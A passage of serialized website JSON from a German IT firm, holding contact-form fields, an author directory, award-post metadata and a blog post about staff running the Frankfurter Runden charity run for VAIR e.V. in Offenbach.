Details findest du in unserer \u003Ca href=\"/de/privacy\">Datenschutzerklärung\u003C/a>.","checkbox","dataprotection","Bitte bestätigen",{"type":911,"id":937,"value":876},"_topic",{"type":911,"id":939,"value":940},"_location","World",{"type":911,"id":942,"value":943},"_subject","Form: Frontier Partner | DE",{"type":911,"id":945,"value":946},"inbox_key","gkgab-contact-form",{"type":911,"id":948},"_gotcha",{"type":911,"id":950},"jsonData",[952,955],{"lang":953,"href":954},"en","/en/posts/2026-06-26-frontier-partner",{"lang":956,"href":957},"es","/es/posts/2026-06-26-frontier-partner",{"slick":508,"form":508},"/posts/2026-06-26-frontier-partner",{"title":799,"description":808},"posts/2026-06-26-frontier-partner",[963,964,965],"Award","Microsoft Partner","AI","tLCzUAnMNG47RJlgvquX3YwGkm9VcOsCR-QbrnWl0S4",{"id":968,"extension":969,"meta":970,"stem":7,"__hash__":1312},"authors_data/authors.json","json",{"path":971,"Alexander Schlindwein":972,"Sophie Luna":978,"Nadine Kern":986,"Karsten Kleinschmidt":993,"Julian Wendt":999,"Holger Bunkradt":1004,"Ralf Mania":1010,"Oliver Kieselbach":1016,"Steffen Schwerdtfeger":1022,"Gunnar Winter":1030,"Jan Petersen":1035,"Thorsten Kunzi":1040,"Moritz Pohl":1044,"Thorben Pöschus":1049,"Christoph Hannebauer":1055,"Marco Scheel":1059,"Christopher Brumm":1064,"Florian Klante":1071,"Niklas Bachmann":1076,"Nils Krautkrämer":1081,"Patrick Treptau":1087,"Peter Beckendorf":1092,"Patrick Sobau":1097,"Jörg Wunderlich":1102,"Michael Breither":1106,"Christian Kanja":1111,"Zeba Hoffmann":1117,"Jochen Fröhlich":1122,"Jan Geisbauer":1126,"Gerrit Reinke":1137,"Christian Kordel":1143,"Stephan Wälde":1147,"Carolin Kanja":1152,"Adrian Ritter":1157,"Marvin Bangert":1162,"Thorsten Pickhan":1168,"Christian Lorenz":1174,"Denis Böhm":1179,"Fabian Bader":1184,"Juan Jose Fernandez Perez":1190,"Mahschid Sayyar":1195,"Benjamin Dassow":1200,"Markus Walschburger":1205,"Jonathan Haist":1210,"Daniel Rohregger":1215,"Thomas Naunheim":1220,"Florian Stöckl":1225,"Pascal 
Asch":1230,"Markus Kättner":1235,"Anna Ulbricht":1242,"Annette Brauns":1249,"body":1256,"title":1311,"Thorben Poeschus":1049,"Nils Krautkraemer":1081,"Joerg Wunderlich":1102,"Jochen Froehlich":1122,"Stephan Waelde":1147,"Denis Boehm":1179,"Florian Stoeckl":1225,"Markus Kaettner":1235},"/authors",{"display_name":973,"avatar":974,"permalink":975,"twitter":976,"linkedin":977},"Alexander Schlindwein","people/people-alexander-rudolph.png","/authors/alexander-schlindwein","AlexanderOnIT","schlindwein-alexander",{"display_name":979,"avatar":980,"permalink":981,"twitter":982,"linkedin":983,"imageOffsetLeft":984,"imageOffsetTop":985},"Sophie Luna","c_thumb,h_1600,w_1600/people/people-sophie-luna.jpg","/authors/sophie-luna","glueckkanjagab","../company/glueckkanja-gab","58%","67%",{"display_name":987,"avatar":988,"permalink":989,"twitter":990,"linkedin":991,"imageOffsetTop":992},"Nadine Kern","people/people-nadine-kern.png","/authors/nadine-kern","nadineausRT","nadine-kern","72%",{"display_name":994,"avatar":995,"permalink":996,"twitter":997,"linkedin":998},"Karsten Kleinschmidt","people/people-karsten-kleinschmidt.png","/authors/karsten-kleinschmidt","KarstenonIT","karstenkleinschmidt",{"display_name":1000,"avatar":1001,"permalink":1002,"linkedin":1003},"Julian Wendt","people/people-julian-wendt.png","/authors/julian-wendt","julian-wendt",{"display_name":1005,"avatar":1006,"permalink":1007,"linkedin":1008,"twitter":1009},"Holger Bunkradt","people/people-holger-bunkradt.png","/authors/holger-bunkradt","holger-bunkradt-12b5053b","hbunkradt",{"display_name":1011,"avatar":1012,"permalink":1013,"linkedin":1014,"twitter":1015},"Ralf Mania","people/people-ralf-mania.png","/authors/ralf-mania","ralf-mania-146a2757","RaMa1976",{"display_name":1017,"avatar":1018,"permalink":1019,"linkedin":1020,"twitter":1021},"Oliver 
Kieselbach","people/people-oliver-kieselbach.png","/authors/oliver-kieselbach","oliver-kieselbach-a4a3409","okieselbT",{"display_name":1023,"avatar":1024,"permalink":1025,"linkedin":1026,"twitter":1027,"imageOffsetTop":1028,"imageOffsetLeft":1029},"Steffen Schwerdtfeger","people/people-steffen-schwerdtfeger.png","/authors/steffen-schwerdtfeger","steffen-schwerdtfeger","SteffenAtCloud","79%","51%",{"display_name":1031,"avatar":1032,"permalink":1033,"twitter":982,"linkedin":1034},"Gunnar Winter","c_thumb,h_1600,w_1600/people/people-gunnar-winter.jpg","/authors/gunnar-winter","company/glueckkanja-gab",{"display_name":1036,"avatar":1037,"permalink":1038,"twitter":982,"linkedin":1039},"Jan Petersen","c_thumb,h_1600,w_1600/people/jan-petersen.png","/authors/jan-petersen","jan-petersen-26a901",{"display_name":1041,"avatar":1042,"permalink":1043,"twitter":982,"linkedin":1034,"imageOffsetTop":992},"Thorsten Kunzi","c_thumb,h_1600,w_1600/people/author-thorsten-kunzi.png","/authors/thorsten-kunzi",{"display_name":1045,"avatar":1046,"permalink":1047,"twitter":982,"linkedin":1048},"Dr. Moritz Pohl","c_thumb,h_1600,w_1600/people/people-moritz-pohl.png","/authors/moritz-pohl","dr-moritz-pohl",{"display_name":1050,"avatar":1051,"permalink":1052,"twitter":1053,"linkedin":1054},"Thorben Pöschus","c_thumb,h_1600,w_1600/people/thorben.poeschus.png","/authors/thorben-poeschus","TPO901","thorben-pöschus-624693b7",{"display_name":1056,"avatar":1057,"permalink":1058,"twitter":982,"linkedin":1034,"imageOffsetTop":992},"Dr. 
Christoph Hannebauer","people/people-christoph-hannebauer.png","/authors/christoph-hannebauer",{"display_name":1060,"avatar":1061,"permalink":1062,"twitter":1063,"linkedin":1063},"Marco Scheel","c_thumb,h_1600,w_1600/people/people-marco-scheel.png","/authors/marco-scheel","marcoscheel",{"display_name":1065,"avatar":1066,"permalink":1067,"twitter":1068,"linkedin":1069,"imageOffsetTop":1070},"Christopher Brumm","c_thumb,h_1600,w_1600/people/people-christopher-brumm.jpg","/authors/christopher-brumm","cbrhh","christopherbrumm","66%",{"display_name":1072,"avatar":1073,"permalink":1074,"linkedin":1075,"twitter":982},"Florian Klante","c_thumb,h_1600,w_1600/people/florian-klante.jpg","/authors/florian-klante","florian-klante-6031b31b",{"display_name":1077,"avatar":1078,"permalink":1079,"linkedin":1080,"twitter":982},"Niklas Bachmann","c_thumb,h_1600,w_1600/people/niklas.bachmann.png","/authors/niklas-bachmann","niklas-bachmann-66a863158",{"display_name":1082,"avatar":1083,"permalink":1084,"twitter":1085,"linkedin":1086},"Nils Krautkrämer","c_thumb,h_1600,w_1600/people/nils-krautkraemer.png","/authors/nils-krautkraemer","KrauNils","nils-krautkrämer-8b04bb250",{"display_name":1088,"avatar":1089,"permalink":1090,"linkedin":1091,"twitter":982},"Patrick Treptau","c_thumb,h_1600,w_1600/people/people-patrick-treptau.png","/authors/patrick-traptau","ptreptau",{"display_name":1093,"avatar":1094,"permalink":1095,"linkedin":1096,"twitter":982,"imageOffsetTop":992},"Peter Beckendorf","c_thumb,h_1600,w_1600/people/peter-beckendorf.png","/authors/peter-beckendorf","peter-beckendorf-29a239b1",{"display_name":1098,"avatar":1099,"permalink":1100,"linkedin":1101,"twitter":982},"Patrick Sobau","c_thumb,h_1600,w_1600/people/patrick-sobau.png","/authors/patrick-sobau","patrick-sobau",{"display_name":1103,"avatar":1104,"permalink":1105,"twitter":982},"Jörg 
Wunderlich","c_thumb,h_1600,w_1600/people/joerg-wunderlich.png","/authors/joerg-wunderlich",{"display_name":1107,"avatar":1108,"permalink":1109,"twitter":982,"linkedin":1110},"Michael Breither","c_thumb,h_1600,w_1600/people/people-michael-breither.jpg","/authors/michael-breither","michaelbreither",{"display_name":1112,"avatar":1113,"permalink":1114,"twitter":1115,"linkedin":1116},"Christian Kanja","c_thumb,h_1600,w_1600/people/people-christian-kanja.png","/authors/christian-kanja","cekageka","christian-kanja",{"display_name":1118,"avatar":1119,"permalink":1120,"linkedin":1121,"twitter":982},"Zeba Hoffmann","c_thumb,h_1600,w_1600/people/zeba-hoffmann.png","/authors/zeba-hoffmann","zebahoffmann",{"display_name":1123,"avatar":1124,"permalink":1125,"twitter":982,"linkedin":1034},"Jochen Fröhlich","c_thumb,h_1600,w_1600/people/people-jochen-froehlich.png","/authors/jochen-froehlich",{"display_name":1127,"avatar":1128,"permalink":1129,"twitter":1130,"linkedin":1130,"imageOffsetTop":992,"socials":1131},"Jan Geisbauer","c_thumb,h_1600,w_1600/people/people-jan-geisbauer-csoc.png","/authors/jan-geisbauer","JanGeisbauer",[1132,1134],{"text":728,"href":1133},"https://emptydc.com",{"text":1135,"href":1136},"Podcast","https://hairlessinthecloud.com",{"display_name":1138,"avatar":1139,"permalink":1140,"twitter":1141,"linkedin":1142},"Gerrit Reinke","c_thumb,h_1600,w_1600/people/gerrit-reinke.png","/authors/gerrit-reinke","GLWRe","glwr",{"display_name":1144,"avatar":1145,"permalink":1146,"twitter":982,"linkedin":1034},"Christian Kordel","c_thumb,h_1600,w_1600/people/christian-kordel.png","/authors/christian-kordel",{"display_name":1148,"avatar":1149,"permalink":1150,"twitter":1151,"linkedin":1034},"Stephan 
Wälde","c_thumb,h_1600,w_1600/people/people-stephan-waelde.png","/authors/stephan-waelde","stephanwaelde",{"display_name":801,"avatar":1153,"permalink":1154,"twitter":1155,"linkedin":1156},"c_thumb,h_1600,w_1600/people/people-carolin-kanja.jpg","/authors/carolin-kanja","fraukanja","carolin-kanja",{"display_name":1158,"avatar":1159,"permalink":1160,"twitter":1161,"linkedin":1161},"Adrian Ritter","c_thumb,h_1600,w_1600/people/people-adrian-ritter.png","/authors/adrian-ritter","adrianritter",{"display_name":1163,"avatar":1164,"permalink":1165,"twitter":1166,"linkedin":1167},"Marvin Bangert","c_thumb,h_1600,w_1600/people/people-marvin-bangert.png","/authors/marvin-bangert","marvinbangert","marvin-bangert",{"display_name":1169,"avatar":1170,"permalink":1171,"twitter":1172,"linkedin":1173},"Thorsten Pickhan","c_thumb,h_1600,w_1600/people/people-thorsten-pickhan.png","/authors/thorsten-pickhan","tpickhan","thorsten-pickhan",{"display_name":1175,"avatar":1176,"permalink":1177,"linkedin":1178,"twitter":982},"Christian Lorenz","c_thumb,h_1600,w_1600/people/people-christian-lorenz.png","/authors/christian-lorenz","christianlorenz95",{"display_name":1180,"avatar":1181,"permalink":1182,"linkedin":1183,"twitter":982},"Denis Böhm","c_thumb,h_1600,w_1600/people/people-denis-boehm.png","/authors/denis-boehm","denis-böhm-3bb834135",{"display_name":1185,"avatar":1186,"permalink":1187,"linkedin":1188,"twitter":1189},"Fabian Bader","c_thumb,h_1600,w_1600/people/people-fabian-bader.jpg","/authors/fabian-bader","fabianbader","fabian_bader",{"display_name":1191,"avatar":1192,"permalink":1193,"linkedin":1194},"Juan Jose Fernandez Perez","c_thumb,h_1600,w_1600/people/people-juan-jose-fernandez.jpg","/authors/juan-jose-fernandez-perez","juan-jose-fernandez-perez-8016055",{"display_name":1196,"avatar":1197,"permalink":1198,"linkedin":1199},"Mahschid 
Sayyar","c_thumb,h_1600,w_1600/people/people-mahschid-sayyar.jpg","/authors/mahschid-sayyar","mahschid-sayyar-97544463",{"display_name":1201,"avatar":1202,"permalink":1203,"linkedin":1204},"Benjamin Dassow","c_thumb,h_1600,w_1600/people/people-benjamin-dassow.jpg","/authors/benjamin-dassow","benjamin-dassow",{"display_name":1206,"avatar":1207,"permalink":1208,"linkedin":1209},"Markus Walschburger","c_thumb,h_1600,w_1600/people/people-markus-walschburger.jpg","/authors/markus-walschburger","markus-walschburger",{"display_name":1211,"avatar":1212,"permalink":1213,"linkedin":1214,"imageOffsetTop":992},"Jonathan Haist","c_thumb,h_1600,w_1600/people/people-jonathan-haist.jpg","/authors/jonathan-haist","jonathanhaist",{"display_name":1216,"avatar":1217,"permalink":1218,"linkedin":1219,"imageOffsetTop":992},"Daniel Rohregger","c_thumb,h_1600,w_1600/people/people-daniel-rohregger.jpg","/authors/daniel-rohregger","drohregger",{"display_name":1221,"avatar":1222,"permalink":1223,"linkedin":1224,"imageOffsetTop":1070},"Thomas Naunheim","c_thumb,h_1600,w_1600/people/people-thomas-naunheim.jpg","/authors/thomas-naunheim","thomasnaunheim",{"display_name":1226,"avatar":1227,"permalink":1228,"linkedin":1229,"imageOffsetTop":1070},"Florian Stöckl","c_thumb,h_1600,w_1600/people/people-florian-stoeckl.jpg","/authors/florian-stoeckl","florianstoeckl",{"display_name":1231,"avatar":1232,"permalink":1233,"linkedin":1234,"imageOffsetTop":1070},"Pascal Asch","c_thumb,h_1600,w_1600/people/Pascal.Asch.648.jpg","/authors/pascal-asch","pascal-asch",{"display_name":1236,"avatar":1237,"permalink":1238,"linkedin":1239,"imageOffsetTop":1240,"imageOffsetLeft":1241},"Markus Kättner","c_thumb,h_1600,w_1600/people/markus-kaettner.jpg","/authors/markus-kaettner","markus-kättner-b600119","62%","63%",{"display_name":1243,"avatar":1244,"permalink":1245,"linkedin":1246,"imageOffsetTop":1247,"imageOffsetLeft":1248},"Anna 
Ulbricht","c_thumb,h_1600,w_1600/people/anna-katharina.ulbricht-09.png","/authors/anna-ulbricht","anna-katharina-u-a67702199","70%","50%",{"display_name":1250,"avatar":1251,"permalink":1252,"linkedin":1253,"imageOffsetTop":1254,"imageOffsetLeft":1255},"Annette Brauns","c_thumb,h_2000,w_1200/people/Annette-Brauns-8.jpg","/authors/annette-brauns","annette-brauns","95%","60%",{"Alexander Schlindwein":1257,"Sophie Luna":1258,"Nadine Kern":1259,"Karsten Kleinschmidt":1260,"Julian Wendt":1261,"Holger Bunkradt":1262,"Ralf Mania":1263,"Oliver Kieselbach":1264,"Steffen Schwerdtfeger":1265,"Gunnar Winter":1266,"Jan Petersen":1267,"Thorsten Kunzi":1268,"Moritz Pohl":1269,"Thorben Pöschus":1270,"Christoph Hannebauer":1271,"Marco Scheel":1272,"Christopher Brumm":1273,"Florian Klante":1274,"Niklas Bachmann":1275,"Nils Krautkrämer":1276,"Patrick Treptau":1277,"Peter Beckendorf":1278,"Patrick Sobau":1279,"Jörg Wunderlich":1280,"Michael Breither":1281,"Christian Kanja":1282,"Zeba Hoffmann":1283,"Jochen Fröhlich":1284,"Jan Geisbauer":1285,"Gerrit Reinke":1289,"Christian Kordel":1290,"Stephan Wälde":1291,"Carolin Kanja":1292,"Adrian Ritter":1293,"Marvin Bangert":1294,"Thorsten Pickhan":1295,"Christian Lorenz":1296,"Denis Böhm":1297,"Fabian Bader":1298,"Juan Jose Fernandez Perez":1299,"Mahschid Sayyar":1300,"Benjamin Dassow":1301,"Markus Walschburger":1302,"Jonathan Haist":1303,"Daniel Rohregger":1304,"Thomas Naunheim":1305,"Florian Stöckl":1306,"Pascal Asch":1307,"Markus Kättner":1308,"Anna Ulbricht":1309,"Annette 
Brauns":1310},{"display_name":973,"avatar":974,"permalink":975,"twitter":976,"linkedin":977},{"display_name":979,"avatar":980,"permalink":981,"twitter":982,"linkedin":983,"imageOffsetLeft":984,"imageOffsetTop":985},{"display_name":987,"avatar":988,"permalink":989,"twitter":990,"linkedin":991,"imageOffsetTop":992},{"display_name":994,"avatar":995,"permalink":996,"twitter":997,"linkedin":998},{"display_name":1000,"avatar":1001,"permalink":1002,"linkedin":1003},{"display_name":1005,"avatar":1006,"permalink":1007,"linkedin":1008,"twitter":1009},{"display_name":1011,"avatar":1012,"permalink":1013,"linkedin":1014,"twitter":1015},{"display_name":1017,"avatar":1018,"permalink":1019,"linkedin":1020,"twitter":1021},{"display_name":1023,"avatar":1024,"permalink":1025,"linkedin":1026,"twitter":1027,"imageOffsetTop":1028,"imageOffsetLeft":1029},{"display_name":1031,"avatar":1032,"permalink":1033,"twitter":982,"linkedin":1034},{"display_name":1036,"avatar":1037,"permalink":1038,"twitter":982,"linkedin":1039},{"display_name":1041,"avatar":1042,"permalink":1043,"twitter":982,"linkedin":1034,"imageOffsetTop":992},{"display_name":1045,"avatar":1046,"permalink":1047,"twitter":982,"linkedin":1048},{"display_name":1050,"avatar":1051,"permalink":1052,"twitter":1053,"linkedin":1054},{"display_name":1056,"avatar":1057,"permalink":1058,"twitter":982,"linkedin":1034,"imageOffsetTop":992},{"display_name":1060,"avatar":1061,"permalink":1062,"twitter":1063,"linkedin":1063},{"display_name":1065,"avatar":1066,"permalink":1067,"twitter":1068,"linkedin":1069,"imageOffsetTop":1070},{"display_name":1072,"avatar":1073,"permalink":1074,"linkedin":1075,"twitter":982},{"display_name":1077,"avatar":1078,"permalink":1079,"linkedin":1080,"twitter":982},{"display_name":1082,"avatar":1083,"permalink":1084,"twitter":1085,"linkedin":1086},{"display_name":1088,"avatar":1089,"permalink":1090,"linkedin":1091,"twitter":982},{"display_name":1093,"avatar":1094,"permalink":1095,"linkedin":1096,"twitter":982,"imageOffs
etTop":992},{"display_name":1098,"avatar":1099,"permalink":1100,"linkedin":1101,"twitter":982},{"display_name":1103,"avatar":1104,"permalink":1105,"twitter":982},{"display_name":1107,"avatar":1108,"permalink":1109,"twitter":982,"linkedin":1110},{"display_name":1112,"avatar":1113,"permalink":1114,"twitter":1115,"linkedin":1116},{"display_name":1118,"avatar":1119,"permalink":1120,"linkedin":1121,"twitter":982},{"display_name":1123,"avatar":1124,"permalink":1125,"twitter":982,"linkedin":1034},{"display_name":1127,"avatar":1128,"permalink":1129,"twitter":1130,"linkedin":1130,"imageOffsetTop":992,"socials":1286},[1287,1288],{"text":728,"href":1133},{"text":1135,"href":1136},{"display_name":1138,"avatar":1139,"permalink":1140,"twitter":1141,"linkedin":1142},{"display_name":1144,"avatar":1145,"permalink":1146,"twitter":982,"linkedin":1034},{"display_name":1148,"avatar":1149,"permalink":1150,"twitter":1151,"linkedin":1034},{"display_name":801,"avatar":1153,"permalink":1154,"twitter":1155,"linkedin":1156},{"display_name":1158,"avatar":1159,"permalink":1160,"twitter":1161,"linkedin":1161},{"display_name":1163,"avatar":1164,"permalink":1165,"twitter":1166,"linkedin":1167},{"display_name":1169,"avatar":1170,"permalink":1171,"twitter":1172,"linkedin":1173},{"display_name":1175,"avatar":1176,"permalink":1177,"linkedin":1178,"twitter":982},{"display_name":1180,"avatar":1181,"permalink":1182,"linkedin":1183,"twitter":982},{"display_name":1185,"avatar":1186,"permalink":1187,"linkedin":1188,"twitter":1189},{"display_name":1191,"avatar":1192,"permalink":1193,"linkedin":1194},{"display_name":1196,"avatar":1197,"permalink":1198,"linkedin":1199},{"display_name":1201,"avatar":1202,"permalink":1203,"linkedin":1204},{"display_name":1206,"avatar":1207,"permalink":1208,"linkedin":1209},{"display_name":1211,"avatar":1212,"permalink":1213,"linkedin":1214,"imageOffsetTop":992},{"display_name":1216,"avatar":1217,"permalink":1218,"linkedin":1219,"imageOffsetTop":992},{"display_name":1221,"avatar":
1222,"permalink":1223,"linkedin":1224,"imageOffsetTop":1070},{"display_name":1226,"avatar":1227,"permalink":1228,"linkedin":1229,"imageOffsetTop":1070},{"display_name":1231,"avatar":1232,"permalink":1233,"linkedin":1234,"imageOffsetTop":1070},{"display_name":1236,"avatar":1237,"permalink":1238,"linkedin":1239,"imageOffsetTop":1240,"imageOffsetLeft":1241},{"display_name":1243,"avatar":1244,"permalink":1245,"linkedin":1246,"imageOffsetTop":1247,"imageOffsetLeft":1248},{"display_name":1250,"avatar":1251,"permalink":1252,"linkedin":1253,"imageOffsetTop":1254,"imageOffsetLeft":1255},"Authors","v4BFjFTsIGK6QfYDKS1bZ8NqfUrV_WCoMMRwyN5uv8c",[1314,1388,1492,3715,3951,4263,4326,5020,5506,6328,6453,6588,19044,19289,19443,19550,19630,19858,19978,20068,20736],{"id":798,"title":799,"author":1315,"body":1316,"cta":764,"description":808,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":1359,"moment":874,"navigation":508,"path":959,"seo":1386,"stem":961,"tags":1387,"webcast":749,"__hash__":966},[801],{"type":803,"value":1317,"toc":1354},[1318,1320,1322,1324,1326,1328,1330,1332,1346,1348,1350,1352],[806,1319,808],{},[810,1321,813],{"id":812},[806,1323,816],{},[806,1325,819],{},[810,1327,823],{"id":822},[806,1329,816],{},[806,1331,828],{},[806,1333,831,1334,835,1336,838,1338,835,1340,843,1342,846,1344,849],{},[833,1335,131],{"href":132},[833,1337,45],{"href":46},[833,1339,299],{"href":300},[833,1341,322],{"href":323},[833,1343,394],{"href":395},[833,1345,475],{"href":476},[806,1347,852],{},[810,1349,856],{"id":855},[806,1351,816],{},[806,1353,861],{},{"title":863,"searchDepth":864,"depth":864,"links":1355},[1356,1357,1358],{"id":812,"depth":864,"text":813},{"id":822,"depth":864,"text":823},{"id":855,"depth":864,"text":856},{"lang":4,"seoTitle":872,"titleClass":873,"date":874,"categories":1360,"blogtitlepic":877,"socialimg":878,"customExcerpt":879,"keywords":880,"contactInContent":1361,"hreflang":1382,"published":508,"scripts":1385},[876],{"quote":508,"infos":1362},{
"bgColor":883,"color":884,"boxBgColor":761,"boxColor":884,"headline":885,"subline":886,"level":810,"textStyling":887,"flush":888,"person":1363,"form":1367},{"image":890,"cloudinary":508,"alt":891,"name":892,"quotee":892,"quoteeTitle":893,"quote":894,"detailsHeader":895,"details":1364},[1365,1366],{"text":762,"href":898,"details":899,"icon":900},{"text":763,"href":902,"icon":903},{"ctaText":905,"cta":1368,"method":870,"action":908,"fields":1369},{"skin":907},[1370,1371,1372,1373,1374,1375,1376,1377,1378,1379,1380,1381],{"type":911,"id":912,"value":913},{"label":915,"type":916,"id":917,"required":508,"requiredMsg":918},{"label":920,"type":916,"id":612,"required":508,"requiredMsg":921},{"label":923,"type":924,"id":924,"required":508,"requiredMsg":925},{"label":927,"type":928,"id":929,"required":749,"requiredMsg":930},{"label":932,"type":933,"id":934,"required":508,"requiredMsg":935},{"type":911,"id":937,"value":876},{"type":911,"id":939,"value":940},{"type":911,"id":942,"value":943},{"type":911,"id":945,"value":946},{"type":911,"id":948},{"type":911,"id":950},[1383,1384],{"lang":953,"href":954},{"lang":956,"href":957},{"slick":508,"form":508},{"title":799,"description":808},[963,964,965],{"id":1389,"title":1390,"author":1391,"body":1392,"cta":764,"description":1396,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":1464,"moment":1466,"navigation":508,"path":1484,"seo":1485,"stem":1486,"tags":1487,"webcast":749,"__hash__":1491},"content_de/posts/2026-06-09-vair-run.md","160 Kilometer für den guten Zweck",[1250],{"type":803,"value":1393,"toc":1459},[1394,1397,1401,1403,1413,1417,1419,1428,1431,1437,1441,1443,1446,1453,1456],[806,1395,1396],{},"Sonntagmorgen, 8:30 Uhr, Holbeinsteg am Main. Elf Kolleginnen und Kollegen in einheitlichen NinjaCat-Shirts, bereit für die Frankfurter Runden. Regen, Blitz und Donner inklusive. 
Für einen guten Zweck zu laufen war Motivation genug, um trotz des schlechten Wetters die Laufschuhe zu schnüren.",[810,1398,1400],{"id":1399},"frankfurt-läuft-und-läuft-und-läuft","Frankfurt läuft. Und läuft. Und läuft.",[806,1402,816],{},[806,1404,1405,1406,1412],{},"Die Frankfurter Runden sind ein Breitensport-Event auf einer 10 Kilometer langen Laufstrecke am Mainufer, vorbei an der EZB und dem Hafenpark, mit der Frankfurter Skyline im Blick. Das Besondere: Wer antritt, entscheidet erst im Rennen, wie oft er die Runde dreht. Ein bis vier Runden, also 10 bis 40 Kilometer. Nach jeder absolvierten Runde die freie Wahl: weiterlaufen oder ins Ziel abbiegen. glueckkanja hat den Mitarbeitenden noch einen zusätzlichen Antrieb gesetzt: Pro gelaufene Runde spendet glueckkanja an den ",[833,1407,1411],{"href":1408,"rel":1409},"https://vairein.de/",[1410],"nofollow","VAIR e.V."," in Offenbach und speziell an das Projekt Vairplay.",[810,1414,1416],{"id":1415},"ein-park-für-alle-mitten-in-offenbach","Ein Park für alle, mitten in Offenbach",[806,1418,816],{},[806,1420,1421,1422,1427],{},"Der VAIR e.V. baut unter der Kaiserleibrücke mit ",[833,1423,1426],{"href":1424,"rel":1425},"https://www.vairplay-of.de/",[1410],"Vairplay"," den ersten öffentlichen inklusiven Sport- und Kulturpark der Stadt. Auf einer bisher brachliegenden Fläche von rund 10.000 Quadratmetern soll ein Ort entstehen, der Sport, Bewegung und Kultur zusammenbringt, barrierefrei, offen für alle Altersgruppen und mit Tribünenbühnen für Veranstaltungen.",[806,1429,1430],{},"Zijad Doličanin, Vorstandsvorsitzender des VAIR e.V., sieht darin einen Raum, in dem Menschen zusammenkommen, sich austauschen und Gemeinschaft erleben können, soziale und kulturelle Grenzen überwunden werden und der Zusammenhalt in der Region wächst. Ein Treffpunkt für eine Stadt, die für ihr buntes Miteinander bekannt ist. 
glueckkanja ist durch und durch ein Offenbacher Unternehmen, hier hat alles angefangen, viele Kolleginnen und Kollegen kommen aus der Region, und soziales Engagement fängt für uns dort an, wo wir verwurzelt sind.",[1432,1433],"quotes",{":quotes":1434,":no-fullscreen":1435,"spacing":1436},"quoteZijad","true","mb-10",[810,1438,1440],{"id":1439},"_16-runden-eine-siegerehrung-und-viel-jubel","16 Runden, eine Siegerehrung und viel Jubel",[806,1442,816],{},[806,1444,1445],{},"Kurz nach dem Start zog die erste Gewitterfront über Frankfurt. Dicke Regentropfen, Blitz, Donner, etwas Wind dazu. Auf der Strecke kam kurz die Frage auf, ob die Veranstaltung wohl abgebrochen wird. Wird sie nicht. Also weiter. Die Zuschauer am Mainufer haben trotz des Wetters durchgehend angefeuert, genau die richtige Motivation, wenn man nass und in der zweiten Runde ist.",[806,1447,1448],{},[1449,1450],"img",{"alt":1451,"src":1452},"Frankfurter Runden mit unserer NinjaCat","https://res.cloudinary.com/c4a8/image/upload/blog/pics/frankfurter-runden.jpg",[806,1454,1455],{},"Angefeuert haben sich aber auch die GKler gegenseitig, und das hat sich ausgezahlt. Insgesamt hat das Team an diesem Morgen 16 Runden absolviert. Acht Kolleginnen und Kollegen haben eine Runde gedreht, zwei haben sich für zwei Runden entschieden. Und dann war da noch Lisa, die nach der ersten Runde einfach weitergelaufen ist. Und nach der zweiten auch. 30 Kilometer, Zeit 2:18:50, zweiter Platz Gesamtwertung der Frauen, erster Platz in der Altersklasse. Das Team hat bis zur letzten Sekunde lautstark zugejubelt und auch während der Siegerehrung nicht aufgehört.",[806,1457,1458],{},"160 Kilometer sind an diesem Morgen zusammengekommen, einer nach dem anderen, im Regen, und jeder davon fließt in einen Park, den es in Offenbach noch nicht gibt. 
2027 läuft das Team wieder, vielleicht bei besserem Wetter, vielleicht auch nicht.",{"title":863,"searchDepth":864,"depth":864,"links":1460},[1461,1462,1463],{"id":1399,"depth":864,"text":1400},{"id":1415,"depth":864,"text":1416},{"id":1439,"depth":864,"text":1440},{"lang":4,"seoTitle":1465,"titleClass":873,"date":1466,"categories":1467,"blogtitlepic":1468,"socialimg":1469,"customExcerpt":1470,"keywords":1471,"hreflang":1472,"scripts":1477,"quoteZijad":1478},"Frankfurter Runden 2026: glueckkanja läuft 160 Kilometer für den VAIR e.V. Offenbach","2026-06-08",[876],"frankfurter-runden.png","/heads/frankfurter-runden.png","Elf Kollegen und Kolleginnen, 16 Runden, 160 Kilometer, ein Gewittersturm und eine Podiumsplatzierung: glueckkanja war bei den Frankfurter Runden 2026 dabei und hat für jede gelaufene Runde an den VAIR e.V. gespendet, der in Offenbach einen inklusiven Sport- und Kulturpark baut.","Frankfurter Runden, Spendenlauf Frankfurt, CSR IT Unternehmen, soziales Engagement Offenbach, Teambuilding Offenbach, Top Arbeitgeber Rhein-Main, Vairein Offenbach, VAIR e.V. Offenbach, Vairplay Offenbach, glueckkanja Offenbach, Employer Branding IT, Unternehmenskultur IT, IT Unternehmen Offenbach, Breitensport Frankfurt, inklusiver Park Offenbach, Arbeiten bei glueckkanja",[1473,1475],{"lang":953,"href":1474},"/en/posts/2026-06-09-vair-run",{"lang":956,"href":1476},"/es/posts/2026-06-09-vair-run",{"slick":508,"form":508},{"items":1479},[1480],{"text":1481,"name":1482,"company":1483,"alt":1482},"Das Engagement lokaler Unternehmen ist ein wichtiges Signal für gesellschaftliche Verantwortung und gelebte Verbundenheit mit der Region. 
Solche Partnerschaften ermöglichen nachhaltige Projekte, schaffen Mehrwert für die Gemeinschaft und zeigen, was gemeinsam erreicht werden kann.","Zijad Doličanin","Vorstandsvorsitzender VAIR e.V.","/posts/2026-06-09-vair-run",{"title":1390,"description":1396},"posts/2026-06-09-vair-run",[1488,1489,1490],"Top Arbeitgeber","Employer Branding","Soziales Engagement","ypJGo0Qw7bpAGnq3ARgHfzPwoqUcozeNL2NQSAadkbQ",{"id":1493,"title":1494,"author":1495,"body":1496,"cta":764,"description":1500,"eventid":764,"extension":869,"hideInRecent":749,"layout":870,"meta":3643,"moment":3645,"navigation":508,"path":3705,"seo":3706,"stem":3707,"tags":3708,"webcast":749,"__hash__":3714},"content_de/posts/2026-04-10-incident-to-intelligence.md","Anatomie eines unbekannten AMOS Stealers: Vom Alert zur Immunität in 